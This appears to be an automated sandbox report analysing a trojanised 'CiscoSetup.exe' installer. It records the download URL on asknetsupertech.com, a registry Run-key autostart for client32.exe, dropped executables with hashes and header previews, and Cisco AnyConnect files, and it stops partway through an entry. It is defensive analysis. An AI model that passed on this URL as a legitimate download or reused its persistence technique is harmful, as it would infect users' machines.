                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                  Classification:mal100.rans.troj.spyw.evad.win@14/539@4/4
                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                  • Successful, ratio: 72%
                                                                                                                                                                                                  • Number of executed functions: 143
                                                                                                                                                                                                  • Number of non-executed functions: 213
                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 3588 because it is empty
                                                                                                                                                                                                  • Execution Graph export aborted for target wget.exe, PID 4116 because there are no executed function
                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                  • VT rate limit hit for: https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe
                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                  13:05:54API Interceptor14x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                  13:06:27API Interceptor4920516x Sleep call for process: client32.exe modified
                                                                                                                                                                                                  18:05:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  18:06:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4467816
                                                                                                                                                                                                  Entropy (8bit):6.598146073323608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:+QCnFew3oMj8NiqvOE41lDJO2Gi3VjGClUjtbnaC:+TeOLECDJrpVSZbL
                                                                                                                                                                                                  MD5:03615EEF106C5E54C5279B05A9686B9A
                                                                                                                                                                                                  SHA1:621C9AB49367298751EAAB0E0A29575327041729
                                                                                                                                                                                                  SHA-256:7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3
                                                                                                                                                                                                  SHA-512:BFB2ADE2B66B7CCD3E1CB9FCFAD2AF8D35BD12E063ECC1D388958C5A66776CC865CDD25B72B3786011C388C9A3FF730DAF5F97D58923829DA9DBC76AD393FCE8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........d..............n.......n..q....jf......p.......p.......p.......n.......l...............p..Q....n..........p...|p..s...|pd.............|p......Rich....................PE..L......d..................)...................)...@..........................`D......YD...@...................................8.T.....:.X.............C.hH... B..6..0.6.T.....................6.......6.@.............)..............................text.....).......)................. ..`.rdata..fd....)..f....).............@..@.data.........9.......8.............@....rsrc...X.....:.. ....9.............@..@.reloc...6... B..8....A.............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4467816
                                                                                                                                                                                                  Entropy (8bit):6.598146073323608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:+QCnFew3oMj8NiqvOE41lDJO2Gi3VjGClUjtbnaC:+TeOLECDJrpVSZbL
                                                                                                                                                                                                  MD5:03615EEF106C5E54C5279B05A9686B9A
                                                                                                                                                                                                  SHA1:621C9AB49367298751EAAB0E0A29575327041729
                                                                                                                                                                                                  SHA-256:7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3
                                                                                                                                                                                                  SHA-512:BFB2ADE2B66B7CCD3E1CB9FCFAD2AF8D35BD12E063ECC1D388958C5A66776CC865CDD25B72B3786011C388C9A3FF730DAF5F97D58923829DA9DBC76AD393FCE8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........d..............n.......n..q....jf......p.......p.......p.......n.......l...............p..Q....n..........p...|p..s...|pd.............|p......Rich....................PE..L......d..................)...................)...@..........................`D......YD...@...................................8.T.....:.X.............C.hH... B..6..0.6.T.....................6.......6.@.............)..............................text.....).......)................. ..`.rdata..fd....)..f....).............@..@.data.........9.......8.............@....rsrc...X.....:.. ....9.............@..@.reloc...6... B..8....A.............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):562280
                                                                                                                                                                                                  Entropy (8bit):5.250676972668652
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:E51t8uFDD2edf0sC3Yeba96ga8nXNBZeph17:O12uR2ec3Yijg/dB4ph17
                                                                                                                                                                                                  MD5:A942F7085CF6E0584943727A7B804342
                                                                                                                                                                                                  SHA1:C79F5A2946400942F75BB6D05A853D4018ED7419
                                                                                                                                                                                                  SHA-256:AB1ABBFB3F0AD6A0E16F8FC94F485C67A8AB002A5C05549CF676E4D701E26FF0
                                                                                                                                                                                                  SHA-512:69D42640785AA0B4FABBADD894A92643B4D32BC6FB404B0CCC0B056D8413ABD3684D81BED43D10CED24620BF26A749B4F87A557916F987501986DCA9980C0F44
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.Dz=.*)=.*)=.*)).)(6.*))./(..*))..(/.*)o..(,.*)o.)(,.*)o./(..*)..+(9.*)).+(6.*)=.+)..*)..#(8.*)...)<.*)=..)<.*)..((<.*)Rich=.*)................PE..L......d.....................P......0 ....... ....@.......................................@............................................x............L..hH..............T...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1134696
                                                                                                                                                                                                  Entropy (8bit):5.98101366214949
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:8h0jAkQkbL6TwyIHQ6KkuD/wNo9beiC3Yeba96ga8nXNBZy:8hAA7kbL6TwyIHQZ/wNf3Yijg/dBU
                                                                                                                                                                                                  MD5:5E20E06C6F8A52DF2A20F24BF8E7ED28
                                                                                                                                                                                                  SHA1:F43253FC29F72A6792A49F8499C8547328CB3060
                                                                                                                                                                                                  SHA-256:B2628E6B3620070511BC7BFD7EC75BF30F194D69560DC4925A2CB208EBFF8EA5
                                                                                                                                                                                                  SHA-512:06733AA3684278AD1E00F0F7070BED46698422104AA89E3563154A6477186F0DC34B4C6598B101941AB9C34055891CA1A697B8F233156953D09A184291018CBD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#...g..Yg..Yg..Ys..Xl..Ys..Xt..Ys..X...Y5..Xv..Y5..Xm..Y5..X5..Ys..Xl..Yg..Y...Y...Xk..Y...Yf..Yg.nYf..Y...Xf..YRichg..Y........PE..d......d.........."..........P.......^.........@.............................p............`................................................. ...x............0..03......hH...0...5..(...T.......................(.......8............................................text...|........................... ..`.rdata..............................@..@.data....1..........................@....pdata..03...0...4..................@..@_RDATA.......p......................@..@.rsrc................0..............@..@.reloc...5...0...6..................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):297
                                                                                                                                                                                                  Entropy (8bit):4.260838473974518
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:3FHGzEGBX2WemHRSaiHaXQ0GshjQUoWyvNHiRCIrSa7V:1HTGBGXmHgak2uEiWygRgiV
                                                                                                                                                                                                  MD5:05BADC48F12BCC4CBF5B463321943D98
                                                                                                                                                                                                  SHA1:071138B7F1FFB97147891BA5A59C3C3B69FE4BD2
                                                                                                                                                                                                  SHA-256:9158CA8F1ECE84B45A80B9D43409A528B7D0493F38916A030876D70767C13630
                                                                                                                                                                                                  SHA-512:C1A0F2077676C37AD4B1AD5EAF4AB86BC9C516C82AD515B9A7E7A2A90D70080B2BC7CCC5E37C60F6C2D6A19775769AA8F610A91AFC1EE9F6358F941CF87976AD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "component" : [.. {.. "architecture" : "x86_64",.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "platform" : "windows",.. "type" : "component",.. "version" : "5.0.04021".. }.. ]..}..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):297
                                                                                                                                                                                                  Entropy (8bit):4.260838473974518
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:3FHGzEGBX2WemHRSaiHaXQ0GshjQUoWyvNHiRCIrSa7V:1HTGBGXmHgak2uEiWygRgiV
                                                                                                                                                                                                  MD5:05BADC48F12BCC4CBF5B463321943D98
                                                                                                                                                                                                  SHA1:071138B7F1FFB97147891BA5A59C3C3B69FE4BD2
                                                                                                                                                                                                  SHA-256:9158CA8F1ECE84B45A80B9D43409A528B7D0493F38916A030876D70767C13630
                                                                                                                                                                                                  SHA-512:C1A0F2077676C37AD4B1AD5EAF4AB86BC9C516C82AD515B9A7E7A2A90D70080B2BC7CCC5E37C60F6C2D6A19775769AA8F610A91AFC1EE9F6358F941CF87976AD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "component" : [.. {.. "architecture" : "x86_64",.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "platform" : "windows",.. "type" : "component",.. "version" : "5.0.04021".. }.. ]..}..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1375
                                                                                                                                                                                                  Entropy (8bit):3.276910195764313
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1HTGBAZ6x2XA7h/xmv2uEi+Yx7E36x2XAiB/xmv2uEi+Yx78vUsPRmOV6V:BRAj02uEi+hAO02uEi+zhZmOo
                                                                                                                                                                                                  MD5:565E42342B7C2AF14F371A39589C1B67
                                                                                                                                                                                                  SHA1:DAB8871D9D3C5E565D40437FF366D944C1E51661
                                                                                                                                                                                                  SHA-256:13DDFA583A7C4A29EF617887C77AA4E3DA998F52F76D91E83C57B2D38192F555
                                                                                                                                                                                                  SHA-512:8F21388EA0BCD76ECCA88DEA5ED7292E64A0CC7BBA285272B02942D868E92ECB701D9ECBE2C172A87AF06FB16EA5DD2513075792ECB3556DC09C08A8CB4B7FD5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "component" : [.. {.. "dependencies" : [.. {.. "condition" : [.. {.. "architecture" : "x86".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "require" : [.. {.. "version" : "5.0.04021".. }.. ],.. "type" : "component".. },.. {.. "condition" : [.. {.. "architecture" : "x86_64".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "requ
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1375
                                                                                                                                                                                                  Entropy (8bit):3.276910195764313
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1HTGBAZ6x2XA7h/xmv2uEi+Yx7E36x2XAiB/xmv2uEi+Yx78vUsPRmOV6V:BRAj02uEi+hAO02uEi+zhZmOo
                                                                                                                                                                                                  MD5:565E42342B7C2AF14F371A39589C1B67
                                                                                                                                                                                                  SHA1:DAB8871D9D3C5E565D40437FF366D944C1E51661
                                                                                                                                                                                                  SHA-256:13DDFA583A7C4A29EF617887C77AA4E3DA998F52F76D91E83C57B2D38192F555
                                                                                                                                                                                                  SHA-512:8F21388EA0BCD76ECCA88DEA5ED7292E64A0CC7BBA285272B02942D868E92ECB701D9ECBE2C172A87AF06FB16EA5DD2513075792ECB3556DC09C08A8CB4B7FD5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "component" : [.. {.. "dependencies" : [.. {.. "condition" : [.. {.. "architecture" : "x86".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "require" : [.. {.. "version" : "5.0.04021".. }.. ],.. "type" : "component".. },.. {.. "condition" : [.. {.. "architecture" : "x86_64".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "requ
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):556
                                                                                                                                                                                                  Entropy (8bit):4.645067217480077
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:VKYMF1IXH5EkqfXMF1ITOLKvXwCPijecTygdLe3f8ytWHtO+PGb:iF1a6AF1owBlPkNtWNa
                                                                                                                                                                                                  MD5:A54C8C0CFD88CFE16115DCFF322A637A
                                                                                                                                                                                                  SHA1:DFD99A331FE511542CEE60731DE1F603AB11C3AD
                                                                                                                                                                                                  SHA-256:50695A74F95C74DE1888A94F9BB0DC19E0237500DDD2352D56E4A17F30324AF5
                                                                                                                                                                                                  SHA-512:BDB7E36EBE6F0A9A1F2662C89B4F253A7F354C7A5F2596EE3C52247CA25AF9A6F14B75D432B68DFACFB3611533A0E88648D5F7F3E72099AAFCA4BFA833029AAD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:<html>.. <head>.. <title>Open Source Used In Cisco AnyConnect Secure Mobility Client</title>.. </head>.. <body>.. <h1>Open Source Used In Cisco AnyConnect Secure Mobility Client</h1>.. <br/>.. <h3>Please refer to <a href="https://www.cisco.com/go/opensource">Open Source in Cisco Products</a> for the latest information on the open source used in Cisco AnyConnect Secure Mobility Client.</h3>.. <br/>.. <p><font size="2">&copy;2023 Cisco Systems, Inc. All rights reserved.</font></p>.. </body>..</html>
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3908712
                                                                                                                                                                                                  Entropy (8bit):6.887797216959267
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:1R8wYv1zxStjGudpDcpXkuHdMRwou2pMOLmFn+d8tPB19nW/7BioqbCJ6JMfS20A:1R8w66ttdpDcpUs48nOL6+y719nWTT
                                                                                                                                                                                                  MD5:2A1D5A1BEB44C39B287BB7B9D34DC94E
                                                                                                                                                                                                  SHA1:F6BBD68D77978793BC348E181A1E8D2130C12AD3
                                                                                                                                                                                                  SHA-256:586085F4C7928D93E7C941705837506A69302168347136346D6784F78E67BBDD
                                                                                                                                                                                                  SHA-512:F05F14327B6C341444463CD774358D241655C06D910BAC2F72F007CD1052CE0832697E4F386C2F0810BE501F1E992B6E390A7484CCCEBFD0BB8522E7930246F3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........H...).X.).X.).X.B.Y.).X.B.Y_).X.F.X.).X.\.Y.).X.\.Y.).X.\.Y.).X6@.Y.).X.).X.).X.\.Y|(.X.B.Y.).X.B.Y.).X.).X.(.XP\.Y.).XP\.Y.).XP\.X.).X.)qX.).XP\.Y.).XRich.).X........................PE..L......d...........!......%.........@'........%...............................;...../.<...@A..........................3......8.......9..............\;.hH....9......v2.T...................@w2.....Xv2.@.............%.\............................text...z.%.......%................. ..`.rdata........%.......%.............@..@.data.........8.......8.............@....rsrc.........9......<9.............@..@.reloc........9......D9.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):117
                                                                                                                                                                                                  Entropy (8bit):4.323029521506045
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TL2e2xcH9XyIMGLz1KCr:3FFYttNYTqegcHcIRP1fr
                                                                                                                                                                                                  MD5:B23D2052EB88D57B7EB5F3F6FE0B73DF
                                                                                                                                                                                                  SHA1:3B518BC2C90F511B0F026089E0EA617C532761CB
                                                                                                                                                                                                  SHA-256:EEAF72902741BE5DDA3A2C96DBC14545232A8CB4ABF97117AA8593D5876B182A
                                                                                                                                                                                                  SHA-512:38C528C6094EDD066C50509D970C8C3BDA08BD3206376BE79FA61453B216F14F1BA32E58A807C1EFD1C91A87C3E36953154299B78E1114379331D8BFC69A51F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "vpnapishim.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):118
                                                                                                                                                                                                  Entropy (8bit):4.356540827709149
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLPSifLBHcH9XyIMGLz1KCr:3FFYttNYT/LB8HcIRP1fr
                                                                                                                                                                                                  MD5:FCD4980A92383439E287B087524C7BD9
                                                                                                                                                                                                  SHA1:A91FE2BC7B81A89184D6861EEAB6359C43B1510A
                                                                                                                                                                                                  SHA-256:47FA628E122440B0292AA2F4D645EBE7B7536D4400C3EF7EAD4E1C28DD77BCFB
                                                                                                                                                                                                  SHA-512:D72AE7FAE4E5D95C37E4F5B1A08648662DBF7407DDBD1DCAE0C0D07A45D19E0C2D421BB079CE77AACC766608BF1A61E479F755479881226D368273A8BDFED38C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "acwebhelper.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):117
                                                                                                                                                                                                  Entropy (8bit):4.383545038270626
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLPDlSncH9XyIMGLz1KCr:3FFYttNYTnlSncHcIRP1fr
                                                                                                                                                                                                  MD5:288FCD2FDDC8001D274BCFB8B30AE9E0
                                                                                                                                                                                                  SHA1:4B0E7C4FBD55EBB687D5521F9CA234A1391DBBF5
                                                                                                                                                                                                  SHA-256:CCECC9DF3B737D1F56F4B34280919C8592D0585224E72D0E0ABD9D9A536AF2E6
                                                                                                                                                                                                  SHA-512:F5B3E7E1AEB03B5244387BD1856B3BC059BAF8D4A414D9E1A44F8CC7736EE34D6BF00903857E382D769E550B014ECB74E5A00D3A6022BAC09FA9FA4F38259A7A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "acfeedback.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):115
                                                                                                                                                                                                  Entropy (8bit):4.299463045055552
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLK8yH9XyIMGLz1KCr:3FFYttNYTmvHcIRP1fr
                                                                                                                                                                                                  MD5:769B51BA7501D6050DDC9A09C6A09B76
                                                                                                                                                                                                  SHA1:8BDE26C2B5B4AC5523C6B544147B01FF95A915D1
                                                                                                                                                                                                  SHA-256:4897DE44835053B78530EFAB879AD9BBC8C9480832757364FD953526F00D629A
                                                                                                                                                                                                  SHA-512:13A1DE06ECA2A5A2AFE33EBBCBF06BB9FFCC99F21D5E8216BCAC128AFDF9BCD9AFA57E3C4633E0006AAF0E43F11BC336986708D0ADAF154BC29F335F20723473
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "vpnipsec.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3908712
                                                                                                                                                                                                  Entropy (8bit):6.887797216959267
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:1R8wYv1zxStjGudpDcpXkuHdMRwou2pMOLmFn+d8tPB19nW/7BioqbCJ6JMfS20A:1R8w66ttdpDcpUs48nOL6+y719nWTT
                                                                                                                                                                                                  MD5:2A1D5A1BEB44C39B287BB7B9D34DC94E
                                                                                                                                                                                                  SHA1:F6BBD68D77978793BC348E181A1E8D2130C12AD3
                                                                                                                                                                                                  SHA-256:586085F4C7928D93E7C941705837506A69302168347136346D6784F78E67BBDD
                                                                                                                                                                                                  SHA-512:F05F14327B6C341444463CD774358D241655C06D910BAC2F72F007CD1052CE0832697E4F386C2F0810BE501F1E992B6E390A7484CCCEBFD0BB8522E7930246F3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........H...).X.).X.).X.B.Y.).X.B.Y_).X.F.X.).X.\.Y.).X.\.Y.).X.\.Y.).X6@.Y.).X.).X.).X.\.Y|(.X.B.Y.).X.B.Y.).X.).X.(.XP\.Y.).XP\.Y.).XP\.X.).X.)qX.).XP\.Y.).XRich.).X........................PE..L......d...........!......%.........@'........%...............................;...../.<...@A..........................3......8.......9..............\;.hH....9......v2.T...................@w2.....Xv2.@.............%.\............................text...z.%.......%................. ..`.rdata........%.......%.............@..@.data.........8.......8.............@....rsrc.........9......<9.............@..@.reloc........9......D9.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):117
                                                                                                                                                                                                  Entropy (8bit):4.323029521506045
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TL2e2xcH9XyIMGLz1KCr:3FFYttNYTqegcHcIRP1fr
                                                                                                                                                                                                  MD5:B23D2052EB88D57B7EB5F3F6FE0B73DF
                                                                                                                                                                                                  SHA1:3B518BC2C90F511B0F026089E0EA617C532761CB
                                                                                                                                                                                                  SHA-256:EEAF72902741BE5DDA3A2C96DBC14545232A8CB4ABF97117AA8593D5876B182A
                                                                                                                                                                                                  SHA-512:38C528C6094EDD066C50509D970C8C3BDA08BD3206376BE79FA61453B216F14F1BA32E58A807C1EFD1C91A87C3E36953154299B78E1114379331D8BFC69A51F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "vpnapishim.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):117
                                                                                                                                                                                                  Entropy (8bit):4.383545038270626
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLPDlSncH9XyIMGLz1KCr:3FFYttNYTnlSncHcIRP1fr
                                                                                                                                                                                                  MD5:288FCD2FDDC8001D274BCFB8B30AE9E0
                                                                                                                                                                                                  SHA1:4B0E7C4FBD55EBB687D5521F9CA234A1391DBBF5
                                                                                                                                                                                                  SHA-256:CCECC9DF3B737D1F56F4B34280919C8592D0585224E72D0E0ABD9D9A536AF2E6
                                                                                                                                                                                                  SHA-512:F5B3E7E1AEB03B5244387BD1856B3BC059BAF8D4A414D9E1A44F8CC7736EE34D6BF00903857E382D769E550B014ECB74E5A00D3A6022BAC09FA9FA4F38259A7A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "acfeedback.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):115
                                                                                                                                                                                                  Entropy (8bit):4.299463045055552
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLK8yH9XyIMGLz1KCr:3FFYttNYTmvHcIRP1fr
                                                                                                                                                                                                  MD5:769B51BA7501D6050DDC9A09C6A09B76
                                                                                                                                                                                                  SHA1:8BDE26C2B5B4AC5523C6B544147B01FF95A915D1
                                                                                                                                                                                                  SHA-256:4897DE44835053B78530EFAB879AD9BBC8C9480832757364FD953526F00D629A
